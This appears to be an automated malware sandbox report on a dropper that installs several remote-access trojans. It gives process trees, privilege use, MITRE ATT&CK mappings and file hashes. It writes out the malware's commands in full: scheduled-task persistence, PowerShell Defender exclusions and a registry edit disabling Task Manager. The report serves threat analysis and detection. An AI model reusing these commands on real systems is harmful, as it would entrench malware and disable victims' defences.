pid Process 4832 Fontsession.exe 4704 powershell.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 4832 Fontsession.exe 4832 Fontsession.exe 4704 powershell.exe 4704 powershell.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 4832 Fontsession.exe 4832 Fontsession.exe 4832 Fontsession.exe 4832 Fontsession.exe 4832 Fontsession.exe 3096 powershell.exe 3096 powershell.exe 3096 powershell.exe 1420 powershell.exe 1420 powershell.exe 1420 powershell.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 4560 WizWormStub.exe 4560 WizWormStub.exe 4836 dllhost.exe 4836 dllhost.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 4560 WizWormStub.exe Token: SeDebugPrivilege 1408 QuasarStub.exe Token: SeDebugPrivilege 1516 Client.exe Token: SeDebugPrivilege 4832 Fontsession.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 1740 AudioDriver.exe Token: SeDebugPrivilege 3212 AsyncStub.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 2428 Fontsession.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeDebugPrivilege 4560 WizWormStub.exe Token: SeDebugPrivilege 964 Ass.exe Token: SeDebugPrivilege 964 Ass.exe Token: SeDebugPrivilege 4836 dllhost.exe Token: SeDebugPrivilege 4908 WizWormStub.exe Token: SeDebugPrivilege 1844 WizWormStub.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1516 Client.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1516 Client.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1740 AudioDriver.exe 1516 Client.exe 4560 WizWormStub.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3568 wrote to memory of 3212 3568 713e742f7314ca8d684137f996540b4b.exe 86 PID 3568 wrote to memory of 3212 3568 713e742f7314ca8d684137f996540b4b.exe 86 PID 3568 wrote to memory of 3212 3568 713e742f7314ca8d684137f996540b4b.exe 86 PID 3568 wrote to memory of 4048 3568 713e742f7314ca8d684137f996540b4b.exe 88 PID 3568 wrote to memory of 4048 3568 713e742f7314ca8d684137f996540b4b.exe 88 PID 3568 wrote to memory of 4048 3568 713e742f7314ca8d684137f996540b4b.exe 88 PID 3568 wrote to memory of 1736 3568 713e742f7314ca8d684137f996540b4b.exe 89 PID 3568 wrote to memory of 1736 3568 713e742f7314ca8d684137f996540b4b.exe 89 PID 3568 wrote to memory of 1736 3568 713e742f7314ca8d684137f996540b4b.exe 89 PID 3568 wrote to memory of 1408 3568 713e742f7314ca8d684137f996540b4b.exe 90 PID 3568 wrote to memory of 1408 3568 713e742f7314ca8d684137f996540b4b.exe 90 PID 3568 wrote to memory of 4560 3568 713e742f7314ca8d684137f996540b4b.exe 91 PID 3568 wrote to memory of 4560 3568 713e742f7314ca8d684137f996540b4b.exe 91 PID 4048 wrote to memory of 5024 4048 DCRatStub.exe 92 PID 4048 wrote to memory of 5024 4048 DCRatStub.exe 92 PID 4048 wrote to memory of 5024 4048 DCRatStub.exe 92 PID 4048 wrote to memory of 2168 4048 DCRatStub.exe 93 PID 4048 wrote to memory of 2168 4048 DCRatStub.exe 93 PID 4048 wrote to memory of 2168 4048 DCRatStub.exe 93 PID 1736 wrote to memory of 8 1736 OrcusStub.exe 94 PID 1736 wrote to memory of 8 1736 OrcusStub.exe 94 PID 1408 wrote to memory of 3404 1408 QuasarStub.exe 95 PID 1408 wrote to memory of 3404 1408 QuasarStub.exe 95 PID 5024 wrote to memory of 2696 5024 WScript.exe 97 PID 5024 wrote to memory of 2696 5024 WScript.exe 97 PID 5024 wrote to memory of 2696 5024 WScript.exe 97 PID 2696 wrote to memory of 4832 2696 cmd.exe 99 PID 2696 wrote to memory of 4832 2696 cmd.exe 99 PID 1408 wrote to memory of 1516 1408 QuasarStub.exe 100 PID 1408 wrote to memory of 1516 1408 QuasarStub.exe 100 PID 4560 wrote to memory of 4704 4560 WizWormStub.exe 101 PID 4560 wrote to memory of 4704 4560 WizWormStub.exe 101 PID 1736 wrote to memory of 1740 1736 OrcusStub.exe 103 PID 1736 wrote to memory of 1740 1736 OrcusStub.exe 103 PID 1736 wrote to memory of 1740 1736 OrcusStub.exe 103 PID 1516 wrote to memory of 4032 1516 Client.exe 104 PID 1516 wrote to memory of 4032 1516 Client.exe 104 PID 3212 wrote to memory of 3528 3212 AsyncStub.exe 112 PID 3212 wrote to memory of 3528 3212 AsyncStub.exe 112 PID 3212 wrote to memory of 3528 3212 AsyncStub.exe 112 PID 3212 wrote to memory of 2384 3212 AsyncStub.exe 115 PID 3212 wrote to memory of 2384 3212 AsyncStub.exe 115 PID 3212 wrote to memory of 2384 3212 AsyncStub.exe 115 PID 3528 wrote to memory of 4204 3528 cmd.exe 155 PID 3528 wrote to memory of 4204 3528 cmd.exe 155 PID 3528 wrote to memory of 4204 3528 cmd.exe 155 PID 2384 wrote to memory of 4924 2384 cmd.exe 120 PID 2384 wrote to memory of 4924 2384 cmd.exe 120 PID 2384 wrote to memory of 4924 2384 cmd.exe 120 PID 4560 wrote to memory of 3096 4560 WizWormStub.exe 121 PID 4560 wrote to memory of 3096 4560 WizWormStub.exe 121 PID 4832 wrote to memory of 2428 4832 Fontsession.exe 127 PID 4832 wrote to memory of 2428 4832 Fontsession.exe 127 PID 2696 wrote to memory of 3904 2696 cmd.exe 128 PID 2696 wrote to memory of 3904 2696 cmd.exe 128 PID 2696 wrote to memory of 3904 2696 cmd.exe 128 PID 4560 wrote to memory of 1420 4560 WizWormStub.exe 129 PID 4560 wrote to memory of 1420 4560 WizWormStub.exe 129 PID 2428 wrote to memory of 2396 2428 Fontsession.exe 163 PID 2428 wrote to memory of 2396 2428 Fontsession.exe 163 PID 2396 wrote to memory of 2912 2396 cmd.exe 165 PID 2396 wrote to memory of 2912 2396 cmd.exe 165 PID 4560 wrote to memory of 1216 4560 WizWormStub.exe 166 PID 4560 wrote to memory of 1216 4560 WizWormStub.exe 166 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\713e742f7314ca8d684137f996540b4b.exe"C:\Users\Admin\AppData\Local\Temp\713e742f7314ca8d684137f996540b4b.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\AsyncStub.exe"C:\Users\Admin\AppData\Local\Temp\AsyncStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Ass" /tr '"C:\Users\Admin\AppData\Local\Temp\Ass.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Ass" /tr '"C:\Users\Admin\AppData\Local\Temp\Ass.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp71B5.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4924
-
-
C:\Users\Admin\AppData\Local\Temp\Ass.exe"C:\Users\Admin\AppData\Local\Temp\Ass.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatStub.exe"C:\Users\Admin\AppData\Local\Temp\DCRatStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainPortsessionbroker\QV4mcYA2Sc8KOpCoQlEXh.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ChainPortsessionbroker\G0RgA51UzNSlvJ.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\ChainPortsessionbroker\Fontsession.exe"C:\ChainPortsessionbroker\Fontsession.exe"5⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\ChainPortsessionbroker\Fontsession.exe"C:\ChainPortsessionbroker\Fontsession.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\m2SweGUi15.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2912
-
-
C:\ChainPortsessionbroker\dllhost.exe"C:\ChainPortsessionbroker\dllhost.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3904
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainPortsessionbroker\file.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\OrcusStub.exe"C:\Users\Admin\AppData\Local\Temp\OrcusStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:8
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\QuasarStub.exe"C:\Users\Admin\AppData\Local\Temp\QuasarStub.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3404
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe"C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizWormStub" /tr "C:\ProgramData\WizWormStub.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1216
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Crashpad\attachments\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Crashpad\attachments\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Crashpad\attachments\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\ChainPortsessionbroker\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\ChainPortsessionbroker\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\ChainPortsessionbroker\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\Public\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Public\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Windows\fr-FR\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Windows\fr-FR\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Windows\fr-FR\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4416
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\Services\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4820
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Common Files\Services\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\Services\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ClientC" /sc MINUTE /mo 5 /tr "'C:\Windows\Panther\actionqueue\Client.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1412
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Client" /sc ONLOGON /tr "'C:\Windows\Panther\actionqueue\Client.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ClientC" /sc MINUTE /mo 7 /tr "'C:\Windows\Panther\actionqueue\Client.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Windows\appcompat\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\appcompat\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Windows\appcompat\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Defender\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\timeout.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "timeout" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\timeout.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\timeout.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\ChainPortsessionbroker\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\ChainPortsessionbroker\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\ChainPortsessionbroker\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2416
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4072
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\ChainPortsessionbroker\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ChainPortsessionbroker\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\ChainPortsessionbroker\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2928
-
C:\ProgramData\WizWormStub.exeC:\ProgramData\WizWormStub.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
C:\ProgramData\WizWormStub.exeC:\ProgramData\WizWormStub.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1844
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5e68c730d5e9eea130b20f99f8380e644
SHA1d5387728b7aa9724e5f49d9ebe871c4bcc447c01
SHA25644a30d53788ccbbef510a68b894c40a093ecc4a934b6a7c91037d3180987bf71
SHA5124389361097a762576b0ed8da4ebec4d4189af80decbe0b4e2e7c12a6b2f206107ad0597be557690cac73f0e5875057e48a7338a52403288527329e276cbc6041
-
Filesize
166B
MD5eff3710eb6f094ac204ff6b4d7d7107e
SHA12ec3eebb2037ee862dfd7984101bbec687c7ad7b
SHA2565a27f828660d67faae0e0c7c9d201c543f9e16db4ef1cb5f0883899b86e321d7
SHA51219becb062d3cf759b820fb45170e9aab11e6179475c0090f9306ca2e722f24b74274263fbb4783096ceb10d311dc8f1f3261ef9f44ee0235a70aa0f004cb508c
-
Filesize
224B
MD555733945e00baace8cd6236206f9acf6
SHA161a590cb6acb3e6bfaac1fc5752162fc60647ce5
SHA256d7f4a58ae89de59a45958e9a78eb6d3e83ff45d9843747850fc4f4974f24e3e3
SHA51258ac06c815cc508dc6281cae24a78ac98fce1bd310809f0311a4613adf2f103e92ccd65e073787ef682d9a37adc3ef6fd1c81f7eebdc5f7a0f7b28636caa76c8
-
Filesize
34B
MD5677cc4360477c72cb0ce00406a949c61
SHA1b679e8c3427f6c5fc47c8ac46cd0e56c9424de05
SHA256f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b
SHA5127cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a
-
Filesize
1KB
MD5bbb951a34b516b66451218a3ec3b0ae1
SHA17393835a2476ae655916e0a9687eeaba3ee876e9
SHA256eb70c64ae99d14ac2588b7a84854fbf3c420532d7fe4dfd49c7b5a70c869943a
SHA51263bcbfcf8e7421c66855c487c31b2991a989bdea0c1edd4c40066b52fa3eb3d9d37db1cd21b8eb4f33dd5870cc20532c8f485eab9c0b4f6b0793a35c077f2d6f
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
